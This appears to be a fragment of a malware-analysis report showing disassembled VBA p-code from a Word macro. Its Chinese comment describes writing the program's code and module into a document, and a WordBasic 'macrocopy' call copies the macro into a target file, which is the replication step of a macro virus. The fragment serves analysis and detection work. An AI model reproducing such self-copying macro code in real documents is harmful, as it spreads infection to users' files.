' QuoteRem 0x0004 0x001C "向文档中写入本程序代码及模块"
' Line #142:
' Ld ThisDocument
' MemLd FullName
' LitStr 0x0001 ":"
' Add
' Ld cMyModule
' Add
' Ld TargetFile
' MemLd FullName
' LitStr 0x0001 ":"
' Add
' Ld cMyModule
' Add
' Ld WordBasic
' ArgsMemCall macrocopy 0x0002
' Line #143:
' Ld ThisDocument
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.